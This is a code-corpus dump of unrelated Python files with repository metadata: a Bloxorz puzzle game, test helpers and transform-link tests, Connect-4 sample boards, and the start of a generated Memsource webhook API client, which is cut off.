212e8f051329f4f7392e336b9a99d5c4ae78c019
|
[
"MIT"
] | null | null | null |
Bloxorz.py
|
ilkercankaya/Bloxorz
|
212e8f051329f4f7392e336b9a99d5c4ae78c019
|
[
"MIT"
] | null | null | null |
# 0 is for perpendicular mode
# 1 is for flat mode
# 0 is for X-Axis config
# 1 is for Y-Axis mode
from copy import deepcopy
class Block:
def __init__(self, givenboard, mode, config, positionfirstbox, positionsecondbox):
# Copy Board
self.board = givenboard
# Fill the Board with Block
self.board.field[positionfirstbox[0]][positionfirstbox[1]] = 2
if positionsecondbox != []:
self.board.field[positionsecondbox[0]][positionsecondbox[1]] = 2
self.mode = mode
self.config = config
self.positionFirstBox = positionfirstbox
self.positionSecondBox = positionsecondbox
def isgamewon(self):
if self.mode == 0 and self.positionFirstBox == self.board.goal:
return True
else:
return False
def ismovableleft(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] != 1 \
and self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 2] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] != 1:
return True
else:
return False
if self.config == 1:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] != 1 \
and self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] - 1] != 1:
return True
else:
return False
except IndexError:
return False
def ismovableright(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] != 1 \
and self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 2] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] + 1] != 1:
return True
else:
return False
if self.config == 1:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] != 1 \
and self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] + 1] != 1:
return True
else:
return False
except IndexError:
return False
def ismovableup(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionFirstBox[0] - 2][self.positionFirstBox[1]] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionSecondBox[0] - 1][self.positionSecondBox[1]] != 1:
return True
else:
return False
elif self.config == 1:
if self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] != 1:
return True
else:
return False
except IndexError:
return False
def ismovabledown(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionFirstBox[0] + 2][self.positionFirstBox[1]] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] != 1:
return True
else:
return False
elif self.config == 1:
if self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] != 1:
return True
else:
return False
except IndexError:
return False
def getleft(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
firstbox = [self.positionFirstBox[0], self.positionFirstBox[1] - 2]
return [firstbox, secondbox, 1, 0]
elif self.mode == 1:
if self.config == 0:
firstbox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
return [firstbox, [], 0, self.config]
if self.config == 1:
positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] - 1]
positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
return [positionFirstBox, positionSecondBox, 1, self.config]
def moveleft(self):
if self.mode == 0:
if self.ismovableleft():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] = 2
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 2] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 2]
# Change Mode and Config
self.mode = 1
self.config = 0
return True
else:
return False
elif self.mode == 1:
if self.ismovableleft():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] = 2
# Update object location
self.positionSecondBox = []
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
# Change Mode
self.mode = 0
return True
if self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] = 2
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] - 1] = 2
# Update object location
self.positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] - 1]
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
return True
else:
return False
def moveright(self):
if self.mode == 0:
if self.ismovableright():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] = 2
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 2] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 2]
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
# Change Mode
self.mode = 1
self.config = 0
return True
else:
return False
elif self.mode == 1:
if self.ismovableright():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionSecondBox[1] + 1] = 2
# Update object location
self.positionFirstBox = [self.positionFirstBox[0], self.positionSecondBox[1] + 1]
self.positionSecondBox = []
# Change Mode
self.mode = 0
return True
if self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] = 2
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] + 1] = 2
# Update object location
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
self.positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] + 1]
return True
else:
return False
def getright(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0], self.positionFirstBox[1] + 2]
firstbox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
return [firstbox, secondbox, 1, 0]
elif self.mode == 1:
if self.config == 0:
firstbox = [self.positionFirstBox[0], self.positionSecondBox[1] + 1]
return [firstbox, [], 0, self.config]
if self.config == 1:
positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] + 1]
return [positionFirstBox, positionSecondBox, self.mode, self.config]
def moveup(self):
if self.mode == 0:
if self.ismovableup():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionFirstBox[0] - 2][self.positionFirstBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] - 2, self.positionFirstBox[1]]
# Change Mode
self.mode = 1
self.config = 1
return True
else:
return False
elif self.mode == 1:
if self.ismovableup():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionSecondBox[0] - 1][self.positionSecondBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionSecondBox[0] - 1, self.positionSecondBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
return True
elif self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] = 2
# Update object location
self.positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
self.positionSecondBox = []
# Change Mode
self.mode = 0
return True
else:
return False
def getup(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
firstbox = [self.positionFirstBox[0] - 2, self.positionFirstBox[1]]
return [firstbox, secondbox, 1, 1]
elif self.mode == 1:
if self.config == 0:
positionSecondBox = [self.positionSecondBox[0] - 1, self.positionSecondBox[1]]
positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
return [positionFirstBox, positionSecondBox, self.mode, self.config]
if self.config == 1:
positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
positionSecondBox = []
return [positionFirstBox, positionSecondBox, 0, self.config]
def movedown(self):
if self.mode == 0:
if self.ismovabledown():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionFirstBox[0] + 2][self.positionFirstBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0] + 2, self.positionFirstBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
# Change Mode
self.mode = 1
self.config = 1
return True
else:
return False
elif self.mode == 1:
if self.ismovabledown():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionSecondBox[0] + 1, self.positionSecondBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
return True
elif self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] = 2
# Update object location
self.positionFirstBox = [self.positionSecondBox[0] + 1, self.positionFirstBox[1]]
self.positionSecondBox = []
# Change Mode
self.mode = 0
return True
else:
return False
def getdown(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0] + 2, self.positionFirstBox[1]]
firstbox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
return [firstbox, secondbox, 1, 1]
elif self.mode == 1:
if self.config == 0:
# Adjust the box positions
positionSecondBox = [self.positionSecondBox[0] + 1, self.positionSecondBox[1]]
positionFirstBox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
return [positionFirstBox, positionSecondBox, self.mode, self.config]
if self.config == 1:
# Adjust the box positions
positionFirstBox = [self.positionSecondBox[0] + 1, self.positionFirstBox[1]]
positionSecondBox = []
return [positionFirstBox, positionSecondBox, 0, self.config]
def printfield(self):
    """Print the board to stdout with display symbols.

    Cell codes are rendered as: 1 -> 'X', 0 -> 'O', 2 -> 'S', 3 -> 'G';
    any other value keeps its plain string form.

    Fix: the original ran ``deepcopy(...)`` before ``astype(str)``, but
    ``astype`` already returns a new array, so the deep copy was redundant
    work. The elif chain is replaced by a lookup table.
    """
    symbols = {1: 'X', 0: 'O', 2: 'S', 3: 'G'}
    # astype(str) allocates a fresh array, so the board itself is untouched.
    printer = self.board.field.astype(str)
    for i in range(self.board.field.shape[0]):
        for j in range(self.board.field.shape[1]):
            cell = self.board.field[i][j]
            if cell in symbols:
                printer[i][j] = symbols[cell]
    print("Current Board: \n", printer,"\n")
class Board:
    """Game board parsed from a character grid.

    The constructor converts symbol cells in-place ('X' -> 1, 'O' -> 0,
    'S' -> 2, 'G' -> 3), stores the integer grid in ``field``, and records
    the goal cell: any 'G' found first in a row is zeroed out and its
    coordinates saved in ``goal`` (the per-row scan stops at the first
    match in that row, exactly as before).
    """

    def __init__(self, array):
        """Build the integer field from *array* and locate the goal point."""
        symbol_to_code = {'X': 1, 'O': 0, 'S': 2, 'G': 3}
        rows, cols = array.shape
        # Note: mutates the caller's array in place, as the original did.
        for r in range(rows):
            for c in range(cols):
                cell = array[r][c]
                if cell in symbol_to_code:
                    array[r][c] = symbol_to_code[cell]
        self.field = array.astype(int)
        for r in range(rows):
            for c in range(cols):
                if self.field[r][c] == 3:
                    # Clear the goal marker and remember its location;
                    # break only leaves the inner (column) loop.
                    self.field[r][c] = 0
                    self.goal = [r, c]
                    break
| 48.403941
| 112
| 0.520507
| 1,943
| 19,652
| 5.260422
| 0.045805
| 0.303297
| 0.145876
| 0.105665
| 0.886704
| 0.876627
| 0.863321
| 0.838078
| 0.809901
| 0.769396
| 0
| 0.035764
| 0.373957
| 19,652
| 405
| 113
| 48.523457
| 0.795009
| 0.06208
| 0
| 0.664596
| 0
| 0
| 0.00147
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049689
| false
| 0
| 0.003106
| 0
| 0.251553
| 0.021739
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f75d8056d252f05063a906d0c7a30199a76fe13c
| 195
|
py
|
Python
|
tests/detector/does_not_inherit/__init__.py
|
dadaloop82/viseron
|
1c6c446a4856e16c0e2ed6b9323d169fbdcae20f
|
[
"MIT"
] | 399
|
2020-08-31T21:13:07.000Z
|
2022-03-31T18:54:26.000Z
|
tests/detector/does_not_inherit/__init__.py
|
dadaloop82/viseron
|
1c6c446a4856e16c0e2ed6b9323d169fbdcae20f
|
[
"MIT"
] | 157
|
2020-09-01T18:59:56.000Z
|
2022-03-25T07:14:19.000Z
|
tests/detector/does_not_inherit/__init__.py
|
dadaloop82/viseron
|
1c6c446a4856e16c0e2ed6b9323d169fbdcae20f
|
[
"MIT"
] | 53
|
2020-09-01T07:35:59.000Z
|
2022-03-28T23:21:16.000Z
|
"""Dummy class that does not inherit from the required AbstractObjectDetection."""
class ObjectDetection:
    """Dummy detector class that deliberately does not inherit from the
    required AbstractObjectDetection base class."""
| 32.5
| 86
| 0.779487
| 22
| 195
| 6.909091
| 0.5
| 0.131579
| 0.184211
| 0.236842
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0
| 0
| 0.14359
| 195
| 5
| 87
| 39
| 0.91018
| 0.784615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
f7987d541135e12467c1e68263340cd2f93e7071
| 3,066
|
py
|
Python
|
tests/test_link_transformation.py
|
trnielsen/nexus-constructor
|
65efb6eedca30250b75f142dd29a46bc909958df
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_link_transformation.py
|
trnielsen/nexus-constructor
|
65efb6eedca30250b75f142dd29a46bc909958df
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_link_transformation.py
|
trnielsen/nexus-constructor
|
65efb6eedca30250b75f142dd29a46bc909958df
|
[
"BSD-2-Clause"
] | null | null | null |
from tests.helpers import add_component_to_file
from PySide2.QtGui import QVector3D
from nexus_constructor.component.component import Component
def test_linked_component_is_none_1(nexus_wrapper):
    """A freshly added component has no link target."""
    comp = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    assert comp.transforms.link.linked_component is None
def test_linked_component_is_none_2(nexus_wrapper):
    """Explicitly disabling the link leaves the link target unset."""
    comp = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    comp.transforms.has_link = False
    assert comp.transforms.link.linked_component is None
def test_linked_component_is_none_3(nexus_wrapper):
    """Re-wrapping the same group yields a component with no link target."""
    comp = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    reloaded = Component(comp.file, comp.group)
    assert reloaded.transforms.link.linked_component is None
def test_linked_component_via_transform_1(nexus_wrapper):
    """Depending directly on another component's transform links to it."""
    comp_a = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    comp_b = add_component_to_file(nexus_wrapper, "field", 42, "component2")
    rotation = comp_b.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
    comp_b.depends_on = rotation
    comp_a.depends_on = rotation
    reloaded = Component(comp_a.file, comp_a.group)
    assert reloaded.transforms.link.linked_component == comp_b
def test_linked_component_via_transform_2(nexus_wrapper):
    """A transform-to-transform dependency chain resolves to the other component."""
    comp_a = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    rotation_a = comp_a.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
    comp_a.depends_on = rotation_a
    comp_b = add_component_to_file(nexus_wrapper, "field", 42, "component2")
    rotation_b = comp_b.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
    comp_b.depends_on = rotation_b
    rotation_a.depends_on = rotation_b
    reloaded = Component(comp_a.file, comp_a.group)
    assert reloaded.transforms.link.linked_component == comp_b
def test_linked_component_via_component_1(nexus_wrapper):
    """Setting linked_component directly survives re-wrapping the group."""
    comp_a = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    comp_b = add_component_to_file(nexus_wrapper, "field", 42, "component2")
    rotation = comp_b.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
    comp_b.depends_on = rotation
    comp_a.transforms.link.linked_component = comp_b
    reloaded = Component(comp_a.file, comp_a.group)
    assert reloaded.transforms.link.linked_component == comp_b
def test_linked_component_via_component_2(nexus_wrapper):
    """Direct linking works even when both components carry transforms."""
    comp_a = add_component_to_file(nexus_wrapper, "field", 42, "component1")
    rotation_a = comp_a.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
    comp_a.depends_on = rotation_a
    comp_b = add_component_to_file(nexus_wrapper, "field", 42, "component2")
    rotation_b = comp_b.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
    comp_b.depends_on = rotation_b
    comp_a.transforms.link.linked_component = comp_b
    reloaded = Component(comp_a.file, comp_a.group)
    assert reloaded.transforms.link.linked_component == comp_b
| 44.434783
| 80
| 0.776256
| 412
| 3,066
| 5.475728
| 0.104369
| 0.021277
| 0.023936
| 0.095745
| 0.917553
| 0.917553
| 0.895833
| 0.895833
| 0.895833
| 0.895833
| 0
| 0.058604
| 0.126223
| 3,066
| 68
| 81
| 45.088235
| 0.783501
| 0
| 0
| 0.72
| 0
| 0
| 0.053816
| 0
| 0
| 0
| 0
| 0
| 0.14
| 1
| 0.14
| false
| 0
| 0.06
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e39bb09631944e2a9524a8fb7139242bfa313c5a
| 4,360
|
py
|
Python
|
sampleboards.py
|
CooperLloyd/connect4-logic-model
|
1e9330aa25c639b22c00e55b4bdf3c4c60159289
|
[
"MIT"
] | null | null | null |
sampleboards.py
|
CooperLloyd/connect4-logic-model
|
1e9330aa25c639b22c00e55b4bdf3c4c60159289
|
[
"MIT"
] | null | null | null |
sampleboards.py
|
CooperLloyd/connect4-logic-model
|
1e9330aa25c639b22c00e55b4bdf3c4c60159289
|
[
"MIT"
] | null | null | null |
# Sample Connect-4 boards for exercising the win-detection logic.
# Each board is a 6-row x 7-column grid (row 0 is the top of the board)
# using the integer cell codes below.  The "#Expected Outcome" comment
# above each board records the result the checker is expected to produce.
red = 0
black = 1
empty = 2

#Expected Outcome: True
row_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, red, red, red, red, empty, empty],
    [red, black, red, black, red, empty, empty],
    [black, red, black, red, black, black, empty],
    [black, black, red, black, black, red, black],
]

#Expected Outcome: True
col_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, black, empty, empty, empty, empty],
]

#Expected Outcome: True
pos_diagonal_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, red, empty, empty, empty],
    [empty, empty, red, black, empty, empty, empty],
    [black, red, red, black, black, empty, empty],
    [red, red, black, black, black, empty, empty],
]

#Expected Outcome: True
neg_diagonal_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [red, black, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, red, black, empty, empty, empty],
    [black, red, black, red, empty, empty, empty],
]

#Expected Outcome: True
almost_row_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, red, red, red, empty, empty, red],
    [red, black, red, black, red, black, black],
    [black, red, black, red, black, black, red],
    [black, black, red, black, black, red, black],
]

#Expected Outcome: True
almost_col_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, black, empty, empty, empty, empty],
]

#Expected Outcome: True
almost_pos_diagonal_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [black, red, red, black, empty, empty, empty],
    [black, red, red, black, empty, empty, empty],
    [red, red, black, black, black, empty, empty],
]

#Expected Outcome: True
almost_neg_diagonal_win = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [red, empty, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, red, empty, empty, empty, empty],
    [black, red, black, empty, empty, empty, empty],
]

#Expected Outcome: False
col_loss = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [black, empty, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
]

#Expected Outcome: False (invalid board)
col_black_won_first = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
]

#Expected Outcome: False
# NOTE(review): this grid is identical to col_loss above — confirm the two
# cases were actually meant to differ.
black_won = [
    [empty, empty, empty, empty, empty, empty, empty],
    [empty, empty, empty, empty, empty, empty, empty],
    [black, empty, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
    [black, red, empty, empty, empty, empty, empty],
]
| 42.330097
| 58
| 0.591743
| 535
| 4,360
| 4.783178
| 0.041122
| 1.101993
| 1.37163
| 1.500586
| 0.963267
| 0.962095
| 0.911684
| 0.891755
| 0.891755
| 0.877296
| 0
| 0.000928
| 0.258257
| 4,360
| 103
| 59
| 42.330097
| 0.790353
| 0.06078
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3c408b7e24f111f1ac59793e2fe95acfd1aa1c0
| 183
|
py
|
Python
|
nexus_constructor/model/__init__.py
|
ess-dmsc/nexus-geometry-constructor
|
c4d869b01d988629a7864357b8fc2f49a0325111
|
[
"BSD-2-Clause"
] | null | null | null |
nexus_constructor/model/__init__.py
|
ess-dmsc/nexus-geometry-constructor
|
c4d869b01d988629a7864357b8fc2f49a0325111
|
[
"BSD-2-Clause"
] | 62
|
2018-09-18T14:50:34.000Z
|
2019-02-05T15:43:02.000Z
|
nexus_constructor/model/__init__.py
|
ess-dmsc/nexus-geometry-constructor
|
c4d869b01d988629a7864357b8fc2f49a0325111
|
[
"BSD-2-Clause"
] | null | null | null |
from .group import Group # noqa: F401
from .entry import Entry # noqa: F401
from .component import Component # noqa: F401
from .group_container import GroupContainer # noqa: F401
| 36.6
| 57
| 0.759563
| 25
| 183
| 5.52
| 0.36
| 0.231884
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07947
| 0.174863
| 183
| 4
| 58
| 45.75
| 0.834437
| 0.234973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3d02fc699e97954a845f4b9e03c336389105f50
| 18,919
|
py
|
Python
|
memsource_cli/api/webhook_api.py
|
unofficial-memsource/memsource-cli-client
|
a6639506b74e95476da87f4375953448b76ea90c
|
[
"Apache-2.0"
] | 16
|
2019-09-25T00:20:38.000Z
|
2021-05-04T05:56:10.000Z
|
memsource_cli/api/webhook_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 26
|
2019-09-30T14:00:03.000Z
|
2021-05-12T11:15:18.000Z
|
memsource_cli/api/webhook_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 1
|
2021-05-24T16:19:14.000Z
|
2021-05-24T16:19:14.000Z
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:support@memsource.com>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class WebhookApi(object):
    """Webhook endpoints of the Memsource REST API.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen

    Refactor: the five endpoint pairs shared near-identical kwargs
    validation, header selection and ``call_api`` plumbing; that
    boilerplate is factored into private helpers. Every public method
    signature, error message, path and parameter is unchanged.
    """

    def __init__(self, api_client=None):
        """Store the ApiClient, creating a default one when none is given."""
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    # ------------------------------------------------------------------
    # Shared plumbing (private helpers; behavior identical to the
    # generated per-endpoint boilerplate).
    # ------------------------------------------------------------------

    def _collect_params(self, kwargs, declared, method_name):
        """Validate **kwargs against *declared* parameter names.

        Raises TypeError with the same message the generated code used
        for unknown keywords; returns the accepted params as a dict.
        """
        all_params = list(declared)
        all_params.extend(
            ['async_req', '_return_http_data_only',
             '_preload_content', '_request_timeout'])
        params = {}
        for key, val in six.iteritems(kwargs):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name)
                )
            params[key] = val
        return params

    def _require(self, value, param_name, method_name):
        """Raise ValueError when a required parameter is None/missing."""
        if value is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `%s`"
                % (param_name, method_name))

    def _call(self, resource_path, http_method, params, path_params=None,
              query_params=None, accept=False, content_type=False,
              response_type=None):
        """Issue the HTTP request through the shared ApiClient.

